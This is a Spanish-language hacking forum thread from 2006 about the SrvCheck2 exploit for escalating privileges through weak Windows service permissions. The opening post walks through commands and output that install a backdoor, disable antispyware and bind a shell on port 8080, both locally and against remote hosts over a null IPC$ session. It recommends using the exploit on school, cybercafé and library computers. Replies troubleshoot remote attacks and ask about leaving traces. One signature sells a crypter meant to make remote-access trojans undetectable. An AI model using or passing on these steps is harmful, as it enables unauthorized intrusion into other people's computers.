elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
22 Agosto 2008, 00:04  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado (Moderadores: ANELKAOS, zhyzura)
| | |-+  Sobre el nuevo exploit de SrvCheck2
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Imprimir
Autor Tema: Sobre el nuevo exploit de SrvCheck2  (Leído 2865 veces)
||MadAntrax||
Lab Member
Moderador Global
*****
Desconectado Desconectado

Mensajes: 1.419


This is the end, my only friend, the end...


Ver Perfil WWW
Sobre el nuevo exploit de SrvCheck2
« en: 13 Febrero 2006, 21:21 »

Buenas, desde hace unos dias la web de www.cyruxnet.org nos ofrece un nuevo exploit que se basa en una debil configuración de los servicios de windows para elevar los privilegios de forma local.

Ahora ha salido la versión 2.0 que permite una elevación de privilegios tanto local como remota, el funcionamiento es el siguiente:

Descargamos el archivo de su web oficial y ejecutamos en nuestro PC el comando siguiente:

Código:
srvcheck2 -l

Esto nos listará todos los servicios que tengamos en nuestro PC vulnerables a este exploit. Para el caso buscaremos el servicio UPNPHOST y lo explotaremos con el comando:

Código:
srvcheck2 -m upnphost

Despues de unos segundos el exploit nos responderá algo asi como:

Código:
[+] Trying to enumerate local resources
[+] Username: MadAntrax
[+] Uninstalling previous backdoors
[+] Granting Remote bindshell Execution..
[+] Shutting down remote antispyware Service =)
[+] Installing Backdoor Code...
[+] The service have been succesfully modified =)
[+] Service Opened. Trying to Start... (wait a few seconds)
[+] StarteService() Error due to a non service application execution
[+] Ignore it. Your application should be executed =)
[+] Now connect to port 8080 and enjoy your new privileges

Con esto conseguimos bindear una shell a nuestro puerto local 8080. Usaremos NetCat para conectarnos:

Código:
nc 127.0.0.1 8080

Y nos saltará un prompt con los privilegios elevados.

========================

Ok, hasta aqui todo funciona de maravilla y podemos usar este ejemplo para elevar nuestros privilegios en las situaciones que lo requiera (En el colegio, cibercafés, bibliotecas, etc...)

Ahora quiero usar la funcionalidad extra de la version 2.0, que permite explotar un servicio de forma remota, según el archivo de ayuda se hace con el comando:

Código:
srvcheck2 -l -H 81.61.100.2

Con esto podremos hacer un listado de los servicios vulnerables que tiene la maquina 81.61.100.2. Para ello establece una sesión nula IPC$ en el host remoto.

Despues tendremos que poner el comando:

Código:
srvcheck2 -H 81.61.100.2 -m upnphost

Y el exploit nos responderá:

Código:
[+] Trying to connect to remote SCM
[+] Host: \\81.61.100.2\IPC$
[+] Username: (null)
[+] Password: (null)
[+] Network Connection OK
[+] Uninstalling previous backdoors
[+] Granting Remote bindshell Execution..
[+] Shutting down remote antispyware Service =)
[+] Installing Backdoor Code...
[+] The service have been succesfully modified =)
[+] Service Opened. Trying to Start... (wait a few seconds)
[+] StarteService() Error due to a non service application execution
[+] Ignore it. Your application should be executed =)
[+] Now connect to port 8080 and enjoy your new privileges

y podremos hacer NetCat en el host remoto con privilegios elevados.

Mi pregunta es: ¿Bajo que entornos podremos explotar esta vulnerabilidad? ¿Tienen que ser equios del mismo dominio? ¿Pueden ser en hosts que esten completamente remotos?

Gracias a todos: play hard, go pr0!
En línea

MSN Kick 1.5 (100%)
Cactus Joiner 3.0 (65%)
Cactus Metamorph 0.2.1 (100%)
Cactus Downloader (45%)
Cactus Keylogger (30%)
Cactus Worm Generator (20%)

User

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Sobre el nuevo exploit de SrvCheck2
« Respuesta #1 en: 17 Febrero 2006, 05:27 »

Wenaz ||MadAntrax||  .. ya k mencionas lo del SrvCheck2   ..keria preguntare si ya probaste el xploit  .por decir en una red ... pos yo lo intente en una red .. y al tratar de listar las vulnerabiliades de otra makina  .. me sale error  ..simplemente no me lista  ..las makinas en las k las probe tienen xp  ..sin contraseña ni usuario  ....  alguien de aki k ya lohaya probado ?
En línea
TMT

Desconectado Desconectado

Mensajes: 20


Ver Perfil
Re: Sobre el nuevo exploit de SrvCheck2
« Respuesta #2 en: 17 Febrero 2006, 12:39 »

En mi caso hace todos los pasos bien pero cuando hago el

nc <dir_ip> 8080

el nc sale sin decir ni mú, ni abrir ningún tipo de cmd en el equipo remoto.

Esto es lo que hay.
En línea
kicking people

Desconectado Desconectado

Mensajes: 210


Ver Perfil
Re: Sobre el nuevo exploit de SrvCheck2
« Respuesta #3 en: 17 Febrero 2006, 19:28 »

En mi caso hace todos los pasos bien pero cuando hago el

nc <dir_ip> 8080

el nc sale sin decir ni mú, ni abrir ningún tipo de cmd en el equipo remoto.

Esto es lo que hay.

Agrega el modo verbose asi te da algo de info
Ejemplo:
nc -vv (dir_ip) 8080
En línea

User

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Sobre el nuevo exploit de SrvCheck2
« Respuesta #4 en: 18 Febrero 2006, 05:02 »

alguien sabe por que esto ?

C:\Documents and Settings\Administrador\Escritorio>srvcheck2 -l -H 192.168.1.180
 Services Permissions checker v2.0
 (c) 2006 Andres Tarasco - atarasco@gmail.com

  • Trying to connect to remote SCM
  • Host: \\192.168.1.180\IPC$
  • Username: (null)
  • Password: (null)
  • Network Connection OK
  • [-] OpenScManager() FAILED
    ErrorCode 5: Acceso denegado.
En línea
TMT

Desconectado Desconectado

Mensajes: 20


Ver Perfil
Re: Sobre el nuevo exploit de SrvCheck2
« Respuesta #5 en: 18 Febrero 2006, 13:35 »

alguien sabe por que esto ?

C:\Documents and Settings\Administrador\Escritorio>srvcheck2 -l -H 192.168.1.180
 Services Permissions checker v2.0
 (c) 2006 Andres Tarasco - atarasco@gmail.com

  • Trying to connect to remote SCM
  • Host: \\192.168.1.180\IPC$
  • Username: (null)
  • Password: (null)
  • Network Connection OK
  • [-] OpenScManager() FAILED
    ErrorCode 5: Acceso denegado.
Me temo que esto quiere decir que están al día con los parches de MS.
En línea
AKuMA^Newbie

Desconectado Desconectado

Mensajes: 5



Ver Perfil
Re: Sobre el nuevo exploit de SrvCheck2
« Respuesta #6 en: 14 Marzo 2006, 21:04 »

Hola. Ya sé que hace más de 3 semanas que no se escribe en este post, pero me gustaría saber si todavía funciona bien el exploit y los parches no están muy generalizados...

Lo he intentado repetidas veces con 4 ordenadores distintos y siempre obtengo el mismo error:

C:\Documents and Settings\Administrador\Escritorio>srvcheck2 -l -H 192.168.1.180
 Services Permissions checker v2.0
 (c) 2006 Andres Tarasco - atarasco@gmail.com

# Trying to connect to remote SCM
# Host: \\192.168.1.180\IPC$
# Username: (null)
# Password: (null)
# Network Connection OK
[-] OpenScManager() FAILED
ErrorCode 1722: El servidor RPC no estB disponible.

¿Qué opinais? Gracias por adelantado  :)
En línea

Yo SÍ sé lo que es trabajar duro, porque lo he visto...
track1

Desconectado Desconectado

Mensajes: 102


Ver Perfil
Re: Sobre el nuevo exploit de SrvCheck2
« Respuesta #7 en: 15 Marzo 2006, 19:27 »

Pues no soy ningun experto pero me imagino que ya estan casi todas las pc parchadas, a mi me da el mismo error y la he provado como en 10 pc`s .
En línea

NO HAY CAMINO HACIA LA PAZ,
LA PAZ ES EL CAMINO
NewLog

Desconectado Desconectado

Mensajes: 315



Ver Perfil
Re: Sobre el nuevo exploit de SrvCheck2
« Respuesta #8 en: 21 Marzo 2006, 23:17 »

C:\Documents and Settings\Administrador\Escritorio>srvcheck2 -l -H 192.168.1.180
 Services Permissions checker v2.0
 (c) 2006 Andres Tarasco - atarasco@gmail.com

# Trying to connect to remote SCM
# Host: \\192.168.1.180\IPC$
# Username: (null)
# Password: (null)
# Network Connection OK
[-] OpenScManager() FAILED
ErrorCode 1722: El servidor RPC no estB disponible.

¿Qué opinais? Gracias por adelantado  :)

Es más que posible que esté tras un firewall o un router... A mi me pasa...

Código:
C:\Hacking\Exploits>srvcheck2 -H 127.0.0.1 -m wzcsvc
 Services Permissions checker v2.0
 (c) 2006 Andres Tarasco - atarasco@gmail.com

[+] Trying to connect to remote SCM
[+] Host: \\127.0.0.1\IPC$
[+] Username: (null)
[+] Password: (null)
[+] Network Connection OK
[+] Uninstalling previous backdoors
[+] Granting Remote bindshell Execution..
[+] Shutting down remote antispyware Service =)
[+] Installing Backdoor Code...
[+] The service have been succesfully modified =)
[+] Service Opened. Trying to Start... (wait a few seconds)
[+] StarteService() Error due to a non service application execution
[+] Ignore it. Your application should be executed =)
[+] Now connect to port 8080 and enjoy your new privileges

C:\Hacking\Exploits>

Todo parece funcionar bien..después de varios intentos (Con el router evidentemente no me funcionaba...)

Código:
C:\>nc -vv 127.0.0.1 8080
pc1 [127.0.0.1] 8080 (?): connection refused
sent 0, rcvd 0: NOTSOCK

C:\>nc -vv 127.0.0.1 8080
pc1 [127.0.0.1] 8080 (?): connection refused
sent 0, rcvd 0: NOTSOCK

Sin embargo...el netcat no se conecta! No sé a qué se debe... a ver si alguien tiene una ligera idea!

Gracias ^^
En línea
_anacleto_

Desconectado Desconectado

Mensajes: 39


Ver Perfil
Re: Sobre el nuevo exploit de SrvCheck2
« Respuesta #9 en: 22 Marzo 2006, 12:53 »

Hola

Mis pruebas han sido las siguientes a ver que os parece.

Conectando con IPC$ desde un usuario local que no pertenece al dominio.
      no hay manera --> Acceso Denegado
Yo creo que esto se debe a una directiva (GPO) de W2000 que no permite hacer conexiones anónimas entre máquinas.

Poniendo un usuario local con permisos muy restringidos, conecta con 3 servicios vulnerables dichos servicios están definidos en GPO que los Authenticat Users pueden ejecutarlos

Poniendo un user normal y corriente del dominio sin permisos, o permisos muy restringidos.
mismos servicios que con el usuario de Dominio

El tema es que estos servicios creo que no son muy explotables..
 Mssenger Service (servicio de mensajeria no el msn)
 Registro de Licencias

¿Creéis que puedo explotar alguno?
« Última modificación: 22 Marzo 2006, 12:57 por _anacleto_ » En línea
judas.ysee

Desconectado Desconectado

Mensajes: 93



Ver Perfil
Re: Sobre el nuevo exploit de SrvCheck2
« Respuesta #10 en: 06 Septiembre 2006, 03:40 »

este exploit deja huellas en el otro ordenador verdad??
En línea
sirdarckcat
sdc
CoAdmin
*****
Desconectado Desconectado

Mensajes: 4.463


HAND


Ver Perfil WWW
Re: Sobre el nuevo exploit de SrvCheck2
« Respuesta #11 en: 06 Septiembre 2006, 05:02 »

judas.ysee:
si y bastante visibles..

para los que dicen que no funciona, porque sale acceso denegado, eso no es porque este parcheado.. es porque no tienen permiso de acceder a IPC$ traten con un usuario valido, en esa computadora, o un usuario de red con minimos privilegios..

Saludos!!
En línea

E0N
Lab &
Colaborador

Desconectado Desconectado

Mensajes: 2.582


Por variar un poco de avatar.. :P


Ver Perfil WWW
Re: Sobre el nuevo exploit de SrvCheck2
« Respuesta #12 en: 06 Septiembre 2006, 12:16 »

Hola:

Yo lo pruevo en mi propio pc y me sale esto:

Código:
C:\>srvcheck2 -m upnphost
 Services Permissions checker v2.0
 (c) 2006 Andres Tarasco - atarasco@gmail.com

[+] Trying to enumerate local resources
[+] Username: Jose
[+] Uninstalling previous backdoors
[+] Granting Remote bindshell Execution..
[+] Shutting down remote antispyware Service =)
[+] Installing Backdoor Code...
[+] The service have been succesfully modified =)
[+] Service Opened. Trying to Start... (wait a few seconds)
[+] StarteService() Error due to a non service application execution
[+] Ignore it. Your application should be executed =)
[+] Now connect to port 8080 and enjoy your new privileges

C:\>nc -vv 127.0.0.1 8080
DNS fwd/rev mismatch: localhost != Equipo
localhost [127.0.0.1] 8080 (?): connection refused
sent 0, rcvd 0: NOTSOCK

Alguien sabe por q me rechaza la conexion del nc???

1S4ludo
En línea

SMALL CRYPTER PRIVATE VERSION A LA VENTA!!

PI & Bifrost 100% indetectables, stub de solo 5kb, encriptación rc4, source en asm y/o C a la venta y muchas cosas más... Ponte en contacto conmigo para más información.

SCAN PI & BIFROST

PRECIO: 60€, 100€ con source.
G4rBaG3

Desconectado Desconectado

Mensajes: 188



Ver Perfil WWW
Re: Sobre el nuevo exploit de SrvCheck2
« Respuesta #13 en: 08 Septiembre 2006, 14:13 »

EL error NOTSOCK es porque habia un parche ( no r3ecuerdo) q no permitia el uso de raw sockets...O sea q el atacante tiene q teneer permisos de admin.
Acceso denegado puede ser porque no esta registrado ene l dominio, porque esta parchado, porque hay un firewall....mil razones :P
Salu2.
En línea

Don't worry, be hacked....
akivoy

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: Sobre el nuevo exploit de SrvCheck2
« Respuesta #14 en: 12 Septiembre 2006, 18:26 »

a mi me sale un error distinto kien me ayuda.... aki va la imagen...
« Última modificación: 12 Septiembre 2006, 18:32 por akivoy » En línea
Páginas: [1] 2 Ir Arriba Imprimir 
Ir a:  





Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC